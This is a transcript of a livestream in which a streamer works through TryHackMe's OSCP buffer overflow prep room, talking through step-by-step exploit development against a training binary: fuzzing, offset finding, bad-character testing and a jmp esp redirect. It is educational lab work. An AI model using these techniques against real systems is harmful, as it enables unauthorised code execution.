VOD - TryHackMe! Buffer Overflow Prep

Captions
Thanks so much for tuning back in. We are going to be now actually, really, legitimately taking on the OSCP Buffer Overflow Prep room in TryHackMe. We just got xfreerdp installed. I really hope we did. We did, and it's finally working. Okay, so we need to go ahead and set that machine IP address. We have grabbed that from the room and we can go and connect with that right now.

What did you guys think about hanging out on that YouTube video? Any weird thoughts, any opinions? As we are now seeing... what the heck is that? Dude, "I love it when you make your terminal so big." That's a weird thing to say, but I appreciate it. "If YouTube came into contact with Twitch, how big would the buffer overflow be?" That's a genius question, Slick Pop Stream. "Was Remmina working?" Remmina was working, okay. Yeah, it was doing weird stuff with the scale.

All right, with RDP set now, let's see what we're up against. We're on the desktop, we have the vulnerable-apps folder, and we have a couple binaries here. "I've also written a handy guide to exploiting these buffer overflows with the help of mona. We are using Immunity Debugger and we have the machine deployed. Okay, so right-click the Immunity Debugger and choose Run as Administrator. When Immunity loads, click the File > Open icon or choose File > Open, navigate to the vulnerable-apps folder and select the oscp folder. We'll use the oscp.exe binary and click Open. The binary will open in a paused state, so that way you can click the red play button or choose Debug > Run. In a terminal window, the oscp binary should be running and tells you that it's listening on port 1337, leet. On your attacker Kali box, connect to the port on that target using netcat with this syntax right there." That's how we can connect to it, nice and easy. And let's do it. Did xfreerdp just straight up die? I think it did. Connecting to the service, let's make that a thing.

"Can you share terminal details like bashrc or any other configuration?" I probably could. Sodic is asking, "Hey John, sorry, is this a free room?" I think so. This is a free room according to the internet, yes, so we can start to play. We should really... "Do I want to install updates?" Yeah, I don't care, whatever. Can I use Remmina now? Will the scaling actually work if I make a profile? Admin password and client resolution, or a custom... we can use a custom display size, that way we can be able to see it nice and easily. So, "TryHackMe buff prep", Save and Connect, fingers crossed that will behave. I see Shady Boy saying "always trust the internet." Literally, literally. Unicorns is asking, "Do you know much about BlackBerry? I'm about to start supporting their Cylance, which uses AI to detect threats before they've been formally identified/reported. Currently supporting the UEM/MDM solution. Super stoked to get into the threat detection stuff." Truthfully, I don't know a lot about BlackBerry.

What is going on with the whole RDP thing? It's like on and off. Is this whole thing going to be this shaky and unstable? Oh, okay, okay, okay, here she is. Let's see how long this actually stays online, if it does. Yes, it is a free room. So let's open Immunity Debugger. I think we can right-click it and Run as Administrator as it suggested. We'll go ahead and open a program, we'll go ahead and navigate to the desktop. This is super tiny and I'm sorry, you might not be able to easily see it, but if we went into vulnerable-apps, oscp, oscp.exe... oh god, there's no way you're going to be able to see this. Maybe this is a horrible thing to try and stream. I think we can go to the options and set the fonts to... can I add a custom... oh, I can hit Change, right? Yeah, and clearly that needs to be size 14.
I think it's obvious. It's okay, I got my magnifying glass out. Good. "What's a good debugger for using in Linux?" gdb, gdb with GEF, and then we can work with mona. Do we already have mona set up? So I'm typing exclamation point mona in the command window down below. Looks like it is going to return the help information, so it is working just fine. You can set the working folder to any place that you'd like. I suppose we can use that syntax, "!mona config -set workingfolder c:\mona\%p". I will selfishly just grab that and... RDP, RDP, are you still with me? God [ __ ]. Maybe we're not gonna be able to do this room. Maybe this is just gonna be a really shitty stream and we're just gonna accomplish nothing. Maybe we're just not feeling it today. I'm sorry. I appreciate you guys coming to hang out though, like we got a hundred people just coming to party in here, and Remmina is not even letting me kill it. I'm hitting the "let me go, I just want to go home." All right, Remmina is dead. Remmina's reminiscing. Gonzo: "xfreerdp made this ginormous display though."

If nothing comes from this in the next half hour, I will just bail. I will be completely honest, I don't really want to have to tinker with this and I'd rather give you guys something worthwhile to showcase. Maybe Brainpan or something a little bit more fun would be reliable. Or should we just terminate and recreate this machine? Let's kill it and get a new one. Or we could just fail it like a TryHackMe cough, I don't know. What else do we got going on? "Just do a vulnserver one," on Tron? Yeah, that would be a good idea. I do have a video on that over on YouTube, but it would be good to try and get through this path here, you know what I mean? We get 30 seconds until that IP address comes up and we'll see how we do. But the other thing that we should be looking at, if we were to try and keep cruising through this, I guess is called Brainstorm: "reverse engineer a chat program and write a script to exploit a Windows machine." There are not a lot of prompts here or details, so maybe we could work through that. "Do they have cloud rooms you could practice on?" Yeah, I think so, yeah. But let's try this machine yet again and see if it behaves just a little bit better. Let's edit this TryHackMe profile that we had saved in Remmina and then try and Save and Connect and cross our fingers that it behaves.

Honking Waffle says hey, they signed up for Snyk. Thank you so much, I super appreciate that. I think it's honestly gonna be a really good game. It's gonna be super beginner friendly, it's gonna be very, very welcoming to newcomers. If you feel like, hey, yeah, not exactly a thousand percent positive what I'm doing with CTFs just yet, or if you just would like to cut through some good wins, you can do that too. What the jank, please. Okay, we're just not gonna do that one. Let's see what this thing has. How many ports are open? Well, maybe this will actually work with us. "Not too impressed with how much info they wanted." Yeah, I feel that, and I totally understand and I totally agree. Marketing makes the world go around though. They do some sketch stuff though, some marketing, some tracking stuff. Like when you have a website set up as a marketing department for a business or a company, an organization, you might see some crazy stuff on how they do their magic. Like they'll have heat map tracking for the locations that you look around or move your mouse on a website, so that you can see how well your UI/UX is actually working. I guess we're in September 8th now, yeah, yeah, exactly. GoPro Slows like, yeah, keystroke and mouse tracking, it's wacky. Some marketing just is borderline creepy, I will admit, and I don't mean to be discussing this off the tails of a company that I try and support, but you know.

Let's run nmap. Let's run nmap -sC -sV -oN nmap/initial with the IP address, and before we hit enter, let's remember to actually include the -v flag to run verbose mode. It thinks that it has two ports open. It also thinks that the service is down. Maybe... you know what, I think, guys, I just realized the problem. After all this time, I was the fool. I think I have a tun0 interface and I also have a tun1 interface, and I think that might be doing wacky weird stuff. So let's kill that VPN, and now I no longer have a tun1, but I have the OG tun0. I want to die, I want to die more than usual. Can I have a proper Remmina connection now? Do you think we could really end up doing this buffer overflow all along? Let's go, let's go boys, let's go team. We really did take the reverse shell on the universe just a little too far, didn't we? Fingers crossed that this works now. I'm not happy about that, I feel like we've wasted so much time.

All right, let's get reset up. "Is this video going on YouTube?" At this point I don't freaking know. Let's run this thing as administrator, get ourselves situated. Let's change the appearance to go back to a large font, so you guys with your grandma glasses, I really just mean me, I'm talking about me, I really just am talking about my grandma glasses and my inability to see things. So if I hit OK, let's open up our desktop and we'll get to vulnerable-apps, where we have oscp and oscp.exe. Perfect. Why did you not keep the font size that I was telling you? Did I hit undo on accident or something, or cancel? But either way, if you hit the play button, which also has the keyboard hotkey F5... never mind, I was wrong. By the way, if you're in Immunity Debugger and you accidentally completely destroy your view and you're like, where did all my windows go, what is happening, what you need to do is find the CPU window. So if you actually go into Window, you can select "8 CPU" and that should bring it to the foreground, and then double-click on that, or maximize that. You are most likely just about always going to be working in the CPU pane in Immunity Debugger, so if that's what you're working with... That said, the hotkey for running the program is F9, I was wrong. So you can see down below the "Terminated" yellow and red display turned to "Running", so now we know the program is running, and we can see this terminal window would appear. Let me see if I can amp that up. Lucida Console, yeah, bring it to an obnoxious size 24 display, because whatever, 28, I don't care. Look, look, look, it's running great, and now we could access it on that port.

So let's go grab this IP address, modify our README file because I'm pretty sure I changed it, yep, and we could try to connect to it with netcat and we could interact with the service. "Welcome to OSCP Vulnerable Server! Enter HELP for help." So we can enter HELP and then we have a couple options of things that we want to do, or commands that we could run. It's not going to be as explicit, you know, when it's actually crunch time to do a legitimate buffer overflow, but these are the commands that we could run for this service specifically, and this looks very, very similar to vulnserver as you might find on GitHub, which I have a YouTube video for if you're interested. With that said, let's keep moving on and see what we could do with OVERFLOW1. If you wanted to configure mona, which is that exploit developer assistance tool within Immunity Debugger, then you could use bang mona, "!mona", and set a working folder or directory that you'll go ahead and save things in. And I guess they're just going to hand this code to us, which is nice but not extremely necessary. We should probably try and write that and create it ourselves. But we can go ahead and fuzz stuff, we can go ahead and do things, so let's write the script ourselves. We'll put Brainstorm away and we'll start to write what I will call "000_crash.py".

So whenever I'm doing this sort of thing, I like to stage out my progress in different code files, so that way I can go back to a part of the process that I might not have been doing beforehand. So if I were to try and crash the program, cool, now I have a proof of concept. Then I want to see where I could find the EIP, or the instruction pointer, or the RIP, and really see what the offset is, where I clobber things, et cetera, and then finding bad bytes and then all these other procedures.

We'll go ahead and import the socket library, and then I think we can use a "with socket.socket() as s". We can do an "s.connect" and we'll have to specify the host and port. So our host is going to be the IP address we were working with just previously; that has to be represented as a string, so we'll wrap that in double quotes, and then the port number that we want to connect to, which is 1337, being leet. That has to be passed into connect as a tuple, which means you'll have to supply another set of parentheses here. So we could just offer host and port, and then we don't need to run "s.close()" because we're using this context manager, or the with statement. If I try to print "s.recv"... "s.recv" using the socket library in Python requires some value, I think it does in Python 3. Actually, I gotta be honest, I'm not sure. Let's try and run this. recv does take at least one argument, so we have to supply how many bytes we want to receive. The normal, traditional, practical value that you'd pass in here is 4096.
Just, I don't know, it's the boilerplate thing that just tends to be used, and it will return that value in bytes, or what it would have received up to a newline character. So we could get that, I guess, banner and store it as a variable. We could decode it, because it is going to be returned as bytes and maybe we want to see it as a string, and then we could strip out that newline in case we wanted to see that. We could try that again and see. I think it already said, "hey, enter HELP for help." We would have to then enter a command. So that's what we could specify as our prefix, or the command that we want to run, and I'll set this actually just above the socket connection, because we don't exactly need to do all this receiving, I just wanted to showcase that for you. But the command that we would run, we'll go ahead and define, and we'll make sure that's a byte string as well, because all the communication that we're going to end up doing with this socket is going to be bytes in Python 3.
So, "OVERFLOW1", and I think that syntax... okay, no, that is fully spelt out as OVERFLOW1, and then we'll try and send it a ton of stuff. Now what I like to do to do this is actually define a payload, and a payload is going to end up being a byte string, but I'll join together a big long list, and I'll try to do some list comprehension with this, or, excuse me, not list comprehension, but join a big long string together with the pieces or the chunks of data that I want to include in my payload. And this is super duper helpful for when you get into stuff like a ROP, a return-oriented programming exploit, or doing things like structured exception handler, or other shellcode that you might use, or other things that become a little bit more complex than just a flat buffer overflow, a stack-based buffer overflow. Is everyone okay, is everyone good? The chat is freaking dead right now. Did I put you all to sleep? I don't even know.

So we'll add the command, and we have a space at the very, very end of the command, and then we'll add in what we want to actually send following the command, or the buffer, right, what we're using for experimentation's sake. Let's just try to send it like a hundred A's, and one of the beautiful things about Python is that... I'm gonna turn Black off so that way it's not gonna format this for me. Actually, I think I could have left Black on if I just add the comma there, yeah, yeah, perfect. For experimentation's sake we'll send the letter A a hundred times, and Python is really, really good about this because you could literally just multiply a string and you fan it out, you just get 100 A's, super duper quick. Now it's fine to define this payload and create it, but then we need to still send it and see what the service might do. So let's try to do an "s.send", and we'll of course send in the data that we want to send. It has to be represented in bytes, that's why our b prefix is specified there for the double quotes: joining together all these chunks, the command is of the same type, byte string, byte string "A" 100 times, and then we send it and we'll see how this thing responds.

I'll move this over to the side and we'll try to run it over here. I'll hit Ctrl+B, and I have an inconsistent use of spaces and tabs because I am using Python 3. If you're using Sublime Text, you can select everything and then Ctrl+Shift+P and then type in "spaces: convert to spaces" or "tabs: convert to tabs", and then you can very, very easily get rid of that problem in Python 3. Save that, run it again, I'm hitting Ctrl+B, and finished. And I don't know if you caught it, but we saw one thread exit over here. It looks like that didn't cause it to crash because it is still running, so let's try and amp up how much data we're sending it. Let's turn that 100 to 500 and hit Ctrl+B again. Oh, see the new thread come through, still hasn't exited the program. Let's turn that to a thousand and kind of do some binary increasing back and forth. Run it, connection closed, still not crashed. Let's turn this up to like five thousand, let's get super wacky. Ctrl+B, run it. Ooh, I can see Immunity has just spat up and died. Great, fantastic, we can see that we have crashed the program, and we can repeatedly do this with the script, which is why I wanted to encapsulate this process and save it as "000_crash.py". Yeah, nice.

With that done, we can see in Immunity Debugger how the program looks in this dead, crashed state. We can see the registers, EAX, ECX, EDX, et cetera. Registers being kind of low-level boxes to hold data or hold information, like essentially variables, but at the low-level assembly language level, and some of them are unique and some of them are special and some of them are important, especially EIP, or the instruction pointer, that's what the IP stands for. That's telling the program where to go next, and because we have clobbered EIP, we originally were living in a buffer and we have overflowed the buffer with so much data that we've now, like, broken the lid off the cup, you know, and now we're pouring out more data and can overwrite EIP, or the instruction pointer, with that being 41414141, which is the hex representation of all our capital A's. We know that there's potential to abuse this program and make it do things that it wasn't supposed to do.

So let's carry on in our reading. We have written a significantly, I guess, better script than this, or at least cleaner, maybe. It looks like it tried to repeatedly fuzz data over and over again, I think. Yeah, just adding more A's over time looks like it worked for them. But now we know that we have a crash replication and we need to be able to control EIP. The hard part that we're facing right now is that we've just sent 5000 A's, and somewhere in that sea of A characters is one sweet spot where EIP, the instruction pointer, lines up, you know what I mean? Let me help you visualize that, if that's totally cool. Let's say we just had a crap ton of A's. Turn word wrap on... oh, it's already on, so I could just blah blah. Now somewhere in this mix is where EIP is, or the sweet spot for where the program would crash and where we have control over that instruction pointer. All the data that comes before it is going to be junk, and data that we might be able to work with to do other unique things, or all the data that might come after it are other buffers that we might be able to use if they aren't totally... "I see Liberia." That's like my eyes, yes, I'm sorry. Coder Snack says, "Hey, someone told me to come check out your stream, learn about coding hacking tools, you seem very expert." Oh, thanks so much, that's super sweet. I'm by no means an expert, I just like to tinker and poke around and play. Anyway, Octo Money has agreed, we have many, many A's.

The next thing that we're worried about is finding which of those A's is the threshold sweet spot where we have control over EIP. The way you could find that out is replacing the huge length of A's with a cyclic pattern, or a pattern that you know isn't just AAA static over and over and over again, but it's like ABCD, ABCE, ABCF, and some portion is changing every four bytes. We're using four bytes because it is 32 bits in this case, we're working with x86, and that's just going to be the size of an address or some memory location. The question is, how can we generate 5000 entries of that strange cyclic pattern without writing it by hand? So there are a lot of tools that could do this, right? You could use pwntools if you're into that scene, if you're smart with pwntools, or you could use Metasploit and their msf tools. Looks like they actually have that suggested in the TryHackMe room: you can use /usr/share/metasploit-framework/tools/exploit/pattern_create.rb and then specify a length of 600, right. So if I were to actually just locate pattern_create, I see mine right there, mine is in /opt, and I use locate. If you don't have locate installed, you can "sudo apt install mlocate", that is the utility you could use, and then whenever you want to search for something, if you haven't updated your cache, then you can use updatedb to make sure you are now looking for things with locate super easily. I see Octo Money saying, "Yeah, why not just use cyclic?" You totally could. cyclic is part of pwntools. If I "which cyclic", does it tell me? Yeah, yeah, it's a Python script, and you could totally do that. pwntools is absolutely fantastic and something that we should probably focus on on stream at some point, but for the beginner showcase, right, we're going to end up doing this with our good friend pattern_create from the Metasploit Framework tools. So let's run pattern_create, and it needs to know a length, right, the -l argument that you saw being passed in TryHackMe. We originally were working with 5000, so let's just use that, and instantly have a crap ton of data pumped out to the screen. But you can see that slight change in a cyclic pattern, right, so we could grab this entire payload and use that in our script rather than the A's.

I'll call this "finding EIP" and actually remove the "001_crashed" because I saved on accident. But now, rather than the A's, let's just use a byte string and plop in all of that disgusting nonsense. That is what we're going to end up using there, yeah. Oh, I see Rocket Sheep asking, "Hey, how do you actually install pwntools?" and I see Opera Borios, forgive me if I butcher your name, responding, you can just install it with pip, nice and easy. Now that this is done, we could literally just use this against the target. If you find yourself with your Immunity Debugger still paused or crashed because you just broke it with your previous script, you'll want to restart the program. You can use that if you opened the program through Immunity Debugger; if you attached to the process you might not be able to. Le Piece is making fun of me, five minutes ago I said we had cleaner code. If you were to attach to a process in Immunity Debugger, I don't think you can very easily restart it, I might be wrong there, but if you opened it, you can press the playback button to restart the program, or that hotkey is Ctrl+F2. Perfect. Once you restart the program you'll have to hit F9 again to run it, and you can see, there we go. Now let's go ahead and hit Ctrl+B to run our script. You can see over here we have crashed the program and our registers look very, very different, and we've maybe taken control of stuff. Yeah, our EIP value is no longer those 41414141 A's that we represented, but somewhere in the mix of this big humongous awful cyclic pattern. Now we need to know where in that cyclic pattern it was. So to do that, you could be showcasing the pattern_offset tool, which will be in the same directory, or cyclic again if you're using pwntools, and I see some chatter, M Alpha's talking about it. Yep, you can do that super very easily in just one command, but you'll separate it between pattern_create and pattern_offset if you're using this Metasploit tool.

I see Bravo Charlie Romero, or Romeo, sorry, already telling us we can use -q and just slap in... whoa, whoa, whoa, I don't know why it didn't paste. -q, to query, I guess you could think about it as, and then you will go ahead and see where in that big long string you would have had that value. We can see the offset, or that sweet spot or threshold for where we have control over EIP, the instruction pointer. That's super duper worthwhile because now we know, and we can save that. Let's actually call this like "002_eip_overwrite.py" and let's keep track of what we had to begin with. We had an original length of 5000, because we supplied 5000 A's to start with, and then we used the cyclic pattern to find a new offset of 1978. So if we were to take all of our A's leading up to the offset, we could supply what we'll consider a new EIP, and that will just be a byte string of B's for the moment, "BBBB", to just differentiate between our A's. Now I'll add in that new EIP as part of our payload and the chunk and the structure that we want to send it in. But then personally I think it's a really good idea to keep the same length of data that you originally sent when you first found the crash. It just keeps it restrained to what you knew the original crash to be, because maybe sending a shorter length will lead you down a different code path, or sending a larger thing will lead you down a different code path. I just think it's reliable to maintain the same length you originally sent. So the way that you could do that is by adding another buffer but multiplying it out to the final length, which would have been 5000, and then subtracting out the previous chunks that you've just added as part of the buffer, which means we'll remove out the length of the new EIP, so we'll have 5000 minus 4, our BBBB, and then minus the length of, or really our offset as to how many A's we would have in the original value. We don't need to use len there because that's already a number, just like that, not a comma, so Black likes it, and now we have that payload, nice and good, right?

What do you think this will do? Let's go back to Immunity, hit Ctrl+F2 to restart the program, hit F9 to run the program, and let's run this payload. There we go. You can see in Immunity Debugger we have a really interesting thing happen: EAX, the registers up here, saw our original command, "OVERFLOW1 AAAAAAAAA", and then our EIP, or the instruction pointer, is 42424242, or our B's that we supplied, and then the rest of the stack is clobbered with our CCCC buffer. You can see that here in ESP, or the stack pointer. I see Little Unicorns asking, "Hey, so after this value we start writing with the EIP, so we can point to whatever we need?" Yes, exactly. EIP, having control over this instruction pointer, means we can bebop around the program and make it go or do really whatever we want. Cool. Whoa, what are they doing with mona in here? So they use mona to find... oh, "findmsp", to find the Metasploit pattern, so mona might be able to keep it nice and easy for you. Davey Rogers, hello, thanks so much for coming to hang out, it's good to see you my friend. mona could help there, super duper good, but you could also just do the same thing with pattern_offset.

The next thing that we need to do is find bad characters, because we are going to end up needing to eventually have shellcode in this classic stack-based buffer overflow. With that said, shellcode could have characters or bytes that won't easily and readily be interpreted by a program, in case it has some specific things that it's sensitive to in memory. Because we're oftentimes working in a low-level programming language like C or C++, there will be C-style strings, and you're taking an input or data that will be terminated by a null byte, or a "\x00".
though that's why you often hear null bytes are a bad character because it will mean oh stop reading the string it means to stop taking in that input and that data there is potential for other bad characters to be in the mix uh i see bravo charlie romeo also saying hey pip install bad characters what is is that a thing am i just unaware uh pit bad cares a hex bad character generator to instruct encoders like shakata ganai to transform those to other characters low what so you can just get the bad characters generated out displayed out in python oh that's kind of that's that's kind of cheesy not gonna lie uh it'll if it if it just spits it out for you that's i appreciate that and i like that however let me show you some other python magic to just do that naturally um octo many is asking are you allowed to bring your own coded scripts the oscp exam for buffer overflows yes you have any notes or anything that you've already prepared you're totally welcome to use so let me show you a real quick thing uh friends you know how you have the range function in python and you can like count up from zero to a number like 256 yeah 255 specifically maybe the ascii range but it is you know not inclusive so 256 is where you want to be um you know that zero is going to be a bad bite or a null by character so don't use that one or just make it starting from one and if we were to just turn that into a bite array we then have all of the data that would have been in that bad character's language or that library so that is all you need to to get that data so what i like to do is honestly just take a a script let's let's rename a third rendition of this call it like uh find bad characters and let's say all characters can equal that byte array from the range of 1 to 256 and i like to keep track of bad characters in its own list that i might be able to add to or add other things to as i do this iterative process to learn them now i suggest keeping your new eip present with the offset um 
but then adding in all characters that you're trying to test just before your c buffer so you can see it on the stack with an immunity bugger with doing that you know you'll have to remove out the length of all characters so your final payload length is still 5000 or the original one i think that is the best technique you could do just simply add it in to the original chunk that you had and make sure you subtract out that that distance yeah with that said we could figure out in a manual iterative process what the bad characters might be and remove them from our all characters chunk and buffer so let's get back to it hop over to immunity hit ctrl f2 to restart the program f9 to run it and let's execute our script with control b and sublime text okay so uh we can see we are back where we were eip is filled with our bees so we have a potential eip uh place to put it in and then down on the bottom right we can see the dump here as to what our our stack might look like now what i like to do is look for patterns in the vertical lines here um we can see that okay we start with one two three four and this is kind of looking like it's backwards because it's little endian uh but notice that we went from one two three four to five six and then suddenly zero a zero d uh whack right looks like we totally skipped zero seven zero eight and some of those those suddenly became a new line character zero a and zero d and zero nine and then went to zero a et cetera so i i think we lost zero seven as a bad byte yeah just looking through that manually with that in mind let's try and add that to our list we'll add backslash x now having this in our list is all good and fine and dandy but we have to make sure we remove that from the all characters pool that we end up sending as part of our payload so we can iteratively look for the next bad character let's do that let's try and remove those by doing for bad car in bad characters let's say all characters can equal the original characters 
but replace that bad character that we found with nothing, as in we basically just remove it. So this allows us in our Python code to just start to build out a list of these bad characters, and then we could slowly, one by one, add them to the mix as we discover them. Okay, with that done, we don't need to continue going through the rest of these because we immediately already found one bad character. Let's see if we can remediate that and move on without it. Ctrl+F2, F9 to run it, and go. Oh, "a bytes-like object is required, not a string." Because our bad characters need to be represented with a b byte string; everything's got to be bytes. Here we go, run it. Now we can see we're back in action, so we go from 01 02 03 04 05 06, and we're skipping 07, but we have 08 and 09, 0a 0b 0c 0d 0e 0f, and then a weird null byte at 00? Oh no, no, sorry, 0e 0f, and then 10 looks good so far, and then hex 12, 13, 14, 15, all good, all good. 1a 1b 1c 1d. This is where I start to look for that pattern: finding a 15 ae looks like a 26 ae, so we might have missed some other value there. Maybe 1a 1b 1c 1d 1f, actually these all look good, right? Oh no, we actually miss a 2e. It looks like we go from 2d to 0a again, so that dies. We can add 2d as another bad character.

Did anyone follow that logic? Was I talking a little bit too fast, or was that not visible? Just me mumbling to myself; I feel like I'm teaching right now. "Can you right-click EIP and follow in dump?" Seemingly not right now. "Could you copy that dump and search for missing characters using a script?" You can automate that, right? Yes. "What is filtering these bad characters on the target?" That is totally dependent on the binary itself. It's totally dependent on the executable or what you're targeting, what you're up against, and sometimes it's kind of hard to track that down and find it. Truthfully, as painstakingly
slow as the manual process sometimes is, it's still absolutely necessary to just do it kind of by hand. 2d, is that still gone? 2d, 2e is even gone just as well. Let's add 2d and 2e in here. Can anyone fill me in? I would like to learn just as well if there is a better way to automate this. Okay, that looks better, because we go from 2f to 2c to 2f and then 30 through 33, et cetera, et cetera. I'm gonna look for that 0a 0d pattern now, because it looks like everything that gets whacked comes from that structure, and I don't currently see any new ones. Oh, except for 0d 0a following a 9a. It looks like an a1 or an a0; a0 and a1. So let's add b"\xa0". Ctrl+F2, F9. This is the iterative process; it's a little bit slow. "You can use mona, there's a for loop that will go over each byte of what you sent and replace it manually." I wasn't following what was happening there, forgive me. Going back to our As, I no longer see that issue with a0. I don't see any other 00 0a or 0a 0d tricks, so I think we are all good for bad characters, right? You can see that go all the way to our C buffer, yeah.

Vid Ath: "I don't think this really counts as binary exploitation." I'm using Immunity Debugger, which is vomit-inducing, and it's just a classic stack-based buffer overflow. Once I start to do some other leet [ __ ] with ROP or anything other cool, and in Linux, then I'll consider myself doing real pwn, but this is the cookie-cutter baby stuff. I think we're all good with these bad bytes, so we have 07, 2d, 2e and a0. Was there anything else that you think I missed? Am I overlooking anything? Let's get back to TryHackMe and see what it thinks. Looks like it was going to end up using mona to compare some things. I don't know how well mona will do with that; I really just tend to trust doing the manual process. And then we need to find a jump point. So what we're going to end up doing to try and find where we could make the
instruction pointer go: because we now know all of these bad characters, we can continue on in the process of jumping to a different location. We don't need to send all_characters anymore, but now we need to know where we're going to end up running and executing new code on the stack. So if I weren't sending the all_characters buffer, we can see that we just have CCCC, or a C buffer, on the stack, which is something that is currently in our ESP, our stack pointer. You can see all of our Cs, or input that we can control, is some location we could go to. So are there any ways that we could actually have an instruction in this binary, in this program that we're running, that we could latch onto and use and abuse to have us jump our code execution process into what is in the stack, into our buffer of Cs? If we were to literally interpret 43 43 43 43 as an opcode or as an assembly instruction, I think that's like increment ecx maybe, or edx. It's one increment operation, which essentially acts as a NOP, or no-operation instruction, if you don't care about what that register value is. But we would realistically want to use our own NOP sled or anything, but first we need to figure out how we can get to that address in our code execution flow.

This is where mona really, really comes in handy, because you could do things like find a ROP gadget, or look in the binary as to where these instructions might be and what their local addresses are. Mona can help you do this. So if I do an exclamation point, or bang, mona, we'll look for a jmp esp, I think, and then it's jmp. Is that the syntax? Let me go verify. Yeah, `!mona jmp -r esp`, and then you can add in null bytes that you don't want included there with \x00 or other things. Eight Bit Only is asking, no-op or no-hup? It is NOP, sorry. I was processing what Lyrex said. Lyrex is saying CC is actually int3 as far as I know. No
backseating. No, I agree with you. I agree that CC on its own is interrupt, but I believe what we would end up executing there is not CC but hex 43. Do I have nasm? Can I do nasm_shell? Can I locate nasm_shell? Hello. This is another Metasploit utility where you can kind of tinker with hex codes. So if I were to run nasm_shell, I have a lot of errors, but int3 is CC for opcodes, as you suggested. But I think inc ecx as a register is 41. What is inc eax? 40. So how about inc ebx? 43. So hex 43 would refer to an increment ebx instruction. That was totally tangential and not related to buffer overflows, so forgive me.

Let's try and use mona to find a jump instruction with the ESP register. If you run this command and mona displays content for you and then suddenly hides itself for some reason (it does this and I have no idea why), I just like to run mona on its own so that I can get the window to display again. It just gives me all the debug help information, just like -h, but I don't really care; it will still just pull up the menu. Way, way, way up, looks like we can find the results from that previous call. And Zinster's asking, hey John, you're awesome, when do you sleep? Once we're done. The results here display some options for these jmp esp instructions. Now you specifically want to look at the mitigations that might be in place in here: whether or not ASLR is on (address space layout randomization), or whether it's rebased, or the structured exception handlers on, or anything like that. You also oftentimes want this to be included in a DLL or library that is not going to be reloaded every time. If you can get it in the binary itself, that's perfect; however, this one, essfunc, will work just fine as our target because it's not going to be rebased. We want to look for a target with as many False options as we can see, so no security, or at least the least amount of security
mitigations, and still matches our bad character criteria. They note ones that are ASCII, as in the bytes here, the representations, are all filled with ASCII characters, or what they'll kind of be interpreted as. Oftentimes that's really, really good, because for some of your shellcode you're practically always gonna find ASCII characters accepted as good characters, not bad characters. So with that all done, we can select one of these. Honestly, any of them. I'll go ahead and copy to clipboard the address, because 62 50 11 af, none of those are bad characters that we know of in our script. So let's use that, being a jmp esp instruction, and you could just slap this in, but it needs to be represented as little-endian in your Python script. Right now it's just kind of floating as heck, so we need to add a 0x to represent it as hex, but even then it needs to be represented in little-endian. You can pack data in a specific way to get it to return with that structure and style, and you can do that with the built-in library struct. struct has a function struct.pack, and you'll have to specify a specific format specifier as to how you want to pack that data. If you can bear with me, we're really just gonna press the "I believe" button here. This should be a comment; this is not gonna be code that we use right here, right now. If you press the "I believe" button and just bear with me: less-than symbol, alligator face, you know, and then capital I, "<I". That will pack it as little-endian and integer. I think that might be the right representation, and then you'll pass in the argument that you want to convert, so that has to be represented in hex there, and that will return it out in little-endian format for you. I think that's super duper handy, and it is a built-in library; struct is native. You could do this with pwntools, right? If you were to `from pwn import *`, a lot of your life would be much easier if you were using pwntools,
but the function is called p32 for pwntools, for pack as a 32-bit one. Let's, for the sake of nicety, define our own function p32 that will do this for any arbitrary data that we want. We could pass it in as an argument and then return it with data being passed there. Now we can cast things into little-endian super duper easily. Okay, with that said, our jmp_esp variable needs to have that p32 representation there, because we've just defined that and we've wrapped it around that struct.pack call. Now our new_eip doesn't really need to exist; we could set it to jmp_esp and then just keep using that variable if we wanted to, or we could be explicit and just say our new_eip will now be our jmp_esp instruction. Nice and easy.

So let's do an interesting thing. Let's save this code and work with it in Immunity Debugger. Let me Ctrl+F2 to restart the program, hit F9 to run it, but before I execute this payload, before I run the Python script, what I want to do is set a breakpoint in the debugger, in Immunity Debugger, to watch us actually land at that code point as we execute and work through this program. So over on the top left, you can see this is actually where we see all of the instructions for the program: a lot of assembly, a lot of push, pop, mov, lea, jmp, et cetera. You don't have to look at this all that in depth right now, but we know that that's where we're going to see the instructions for what is executing as part of the program's code. If I were to hit G, I think it's Ctrl+G, yeah, let me verify. Yep, it is. Let me restart so we can go back to it. Ctrl+G will let you go to a specific location. Now I could just paste in this new value where we know we're going to end up having a breakpoint. Lapis on the Moon, hello, hello. It's weird talking to you on Twitch instead of YouTube. "Anonymous so far" says thanks for
stabbing John. And I appreciate you correcting yourself, but thank you, yes, I am also thankful for stabbing me. Anyway, you'd better stay anonymous. That's funny. You can see when we hit Ctrl+G and we went to this instruction, it brought us to a jmp esp instruction, exactly what mona was able to find for us. Now I could right-click and set a breakpoint over here. You could hit the toggle button, which is just F2. You'll notice that that line becomes illuminated, like a teal or a light blue, and you could toggle a breakpoint on and off by again hitting F2. So at this point we can run the program, and we're not going to hit this breakpoint yet, but once we execute our payload, we know that we're going to eventually clobber the instruction pointer, break EIP, and then replace it with something at run time that will navigate us to this jmp esp instruction. So let me hit Ctrl+B on this. There we go. Over on the left-hand side you can see, oh, we are paused currently, and we've hit our breakpoint at 6250; you can see that that is the illuminated line right now. Now if I were to try and step, and that I believe is F7, F7 lets us move just one instruction at a time. So I'll hit F7 and you can see that that has jumped the code instructions all the way to these inc ebx, or hex 43 43 43 43, which is our C buffer, which you saw right over here in the stack. Right over here is the contents of our ESP register, and now, because of this jmp esp instruction, we're way over here. I could keep hitting F7, and I don't know if you noticed, but we are in fact executing that inc ebx, or increment ebx. You can see that value in the register changing, going up, as I hit F7 and keep incrementing. So we're executing code off the stack thanks to this setup, but now we are going to need to actually replace this with real code to do something other than just increment ebx. So we can put in shellcode at this point, all because we have the ability to
